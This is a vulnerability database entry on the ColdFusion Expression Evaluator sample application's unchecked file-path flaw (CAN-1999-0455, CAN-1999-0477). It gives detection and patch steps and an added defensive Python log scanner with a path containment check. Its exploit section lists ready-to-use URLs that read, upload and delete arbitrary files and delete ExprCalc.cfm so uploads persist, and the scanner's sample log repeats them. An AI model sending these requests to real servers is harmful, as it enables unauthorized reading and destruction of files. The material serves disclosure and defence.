ColdFusionEvaluator

Vulnerability Description

Brief description: ColdFusion Expression Evaluator does not restrict the file paths it reads, writes, and deletes

Full description: The Expression Evaluator is a sample application shipped with ColdFusion (through version 4.0) to show users how to use ColdFusion's expression evaluation features. Its scripts let a user save a file of expressions and load it again for evaluation, but they take the path of the file to load from the request without checking that it is the file that was saved, so an attacker can name any file on the system that the web server process can reach. An attacker can therefore read, create, overwrite, and delete any such file.

Components: ColdFusion Application Server 2.0, 3.0, 3.1; ColdFusion Server 4.0; not vulnerable: ColdFusion Server 4.1

Systems:

Effect(s) of exploiting: The remote user can read, create, alter, and delete any file on the system available to the web server.

Detecting the hole:

    1. Check the version of the ColdFusion server.
    2. Check whether the sample application directory /cfdocs/expeval/ (in particular openfile.cfm, exprcalc.cfm, and displayopenedfile.cfm) is still present under the web root.

Fixing the hole:

    1. Install the Cold Fusion 4.0.1 Update from the Allaire web site.
    2. Patch your ColdFusion web server using the appropriate patch from Allaire.
    3. Remove the sample application directory /cfdocs/expeval from production servers.

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CAN-1999-0455 -- The Expression Evaluator sample application in ColdFusion allows remote attackers to read or delete files on the server via exprcalc.cfm, which does not restrict access to the server properly.

CVE Number: CAN-1999-0477 -- The Expression Evaluator in the ColdFusion Application Server allows a remote attacker to upload files to the server via openfile.cfm, which does not restrict access to the server properly.

Exploit Information

Attack: To upload a file, request the following URL and submit the file through the form it returns:

http://targethost/cfdocs/expeval/openfile.cfm?OpenFilePath=c:\dumphere.txt
To read a file, request:
http://targethost/cfdocs/expeval/displayopenedfile.cfm?OpenFilePath=c:\getfromhere.txt
To display a file's contents in a web form and then delete it (ExprCalc.cfm removes whatever file it opens), request:
http://targethost/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\getfromhere.txt

To browse the system, don't specify where your file is to be put; let openfile.cfm choose the location. Request

http://targethost/cfdocs/expeval/openfile.cfm
and submit a file. You will be redirected to http://targethost/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt , which discloses where the sample directory sits on disk. Because ExprCalc.cfm deletes the file it opens, replace .\myfile.txt with ExprCalc.cfm and request that URL. This deletes ExprCalc.cfm itself, after which uploaded files stay on the server instead of being deleted.
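The following Python is an added example, not part of this entry and not Allaire's code. It shows two things the entry discusses: under "Detecting the hole", a scanner that runs over web server log lines and flags requests to the three sample scripts, and, for the attack sequence above, the path containment check the sample scripts never made, which is what lets OpenFilePath escape the sample directory or point at ExprCalc.cfm itself. The install path C:\Inetpub\wwwroot\cfdocs\expeval is taken from the redirect above and is an assumption; the log lines are constructed in IIS W3C format, and all function and variable names are hypothetical.

```python
"""Added example: a path containment check of the kind the Expression
Evaluator lacked, plus a log scanner that applies it to requests for the
sample scripts.  Paths, hosts and log lines are constructed for illustration."""

import ntpath
from urllib.parse import parse_qs

# Assumed default location of the sample application on a Windows install.
EXPEVAL_DIR = r"C:\Inetpub\wwwroot\cfdocs\expeval"
# The three sample scripts named in the entry, compared case-insensitively
# as a Windows file system resolves them.
EXPEVAL_SCRIPTS = ("openfile.cfm", "exprcalc.cfm", "displayopenedfile.cfm")


def resolve_under(base, requested):
    """Resolve REQUESTED against BASE the way the sample scripts did: a
    client-supplied absolute path simply replaces BASE.  ntpath is used
    explicitly so Windows-style paths behave the same on any platform."""
    return ntpath.normcase(ntpath.normpath(ntpath.join(base, requested)))


def within_expeval(requested, base=EXPEVAL_DIR):
    """The missing check: after '.', '..' and drive/absolute overrides are
    resolved, the target must still sit below BASE.  The trailing separator
    stops a sibling such as 'expeval2\\x' from passing."""
    base_n = ntpath.normcase(ntpath.normpath(base)).rstrip("\\") + "\\"
    return resolve_under(base, requested).startswith(base_n)


def classify_request(uri_stem, uri_query):
    """Return (script, verdict, requested_path) for one request, or None if
    it does not touch the Expression Evaluator sample scripts."""
    stem_l = uri_stem.lower()
    script = stem_l.rsplit("/", 1)[-1]
    if not stem_l.startswith("/cfdocs/expeval/") or script not in EXPEVAL_SCRIPTS:
        return None
    # ColdFusion URL/form variable names are case-insensitive; fold them.
    params = {k.lower(): v for k, v in
              parse_qs(uri_query, keep_blank_values=True).items()}
    paths = params.get("openfilepath")
    if not paths:
        return (script, "no-path", None)          # e.g. fetching the upload form
    requested = paths[0]
    if not within_expeval(requested):
        return (script, "outside-expeval", requested)   # arbitrary file access
    if ntpath.basename(resolve_under(EXPEVAL_DIR, requested)) in EXPEVAL_SCRIPTS:
        # ExprCalc.cfm deletes whatever it opens; aiming it at a sample
        # script is the trick that makes later uploads persist.
        return (script, "script-delete", requested)
    return (script, "inside-expeval", requested)


def scan_log(text):
    """Scan W3C-style lines (date time c-ip cs-method cs-uri-stem
    cs-uri-query sc-status) and return (client_ip, script, verdict, path)
    for every request that reaches the sample scripts."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        client_ip, uri_stem, uri_query = parts[2], parts[4], parts[5]
        verdict = classify_request(uri_stem, "" if uri_query == "-" else uri_query)
        if verdict is not None:
            findings.append((client_ip,) + verdict)
    return findings


# Constructed log excerpt reproducing the request sequence described above.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-04-21 10:02:11 192.0.2.7 GET /cfdocs/expeval/openfile.cfm - 200
1999-04-21 10:02:40 192.0.2.7 GET /cfdocs/expeval/ExprCalc.cfm RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt 200
1999-04-21 10:03:05 192.0.2.7 GET /cfdocs/expeval/ExprCalc.cfm RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\ExprCalc.cfm 200
1999-04-21 10:03:30 192.0.2.7 GET /cfdocs/expeval/displayopenedfile.cfm OpenFilePath=c:\getfromhere.txt 200
1999-04-21 10:04:00 198.51.100.3 GET /index.cfm - 200
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Any hit at all is worth acting on, since the sample scripts have no business on a production server; the "outside-expeval" and "script-delete" verdicts are the ones that indicate the attack above rather than someone opening the demo. Note that containment alone would not have made the sample safe: ExprCalc.cfm still deletes the file it opens, so a corrected version would also keep user files in a scratch directory separate from the scripts and never delete a file named by the client.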

Related Information

Advisories: The L0pht's original ColdFusion advisory; Phrack's excellent article; Allaire's security bulletin ASB99-01, Expression Evaluator Security Issues; ISS X-Force's database entry coldfusion-expression-evaluator; Security Focus' database entry 115

Related Vulnerabilities:

Reportage

Reporting: Rain Forest Puppy in Phrack 54(8) (Dec. 25, 1998)

Reporting: L0pht in http://www.l0pht.com/advisories/cfusion.txt (April 20th, 1999)

Revision Number 1

  1. Stacey Anderson (7/2/2000):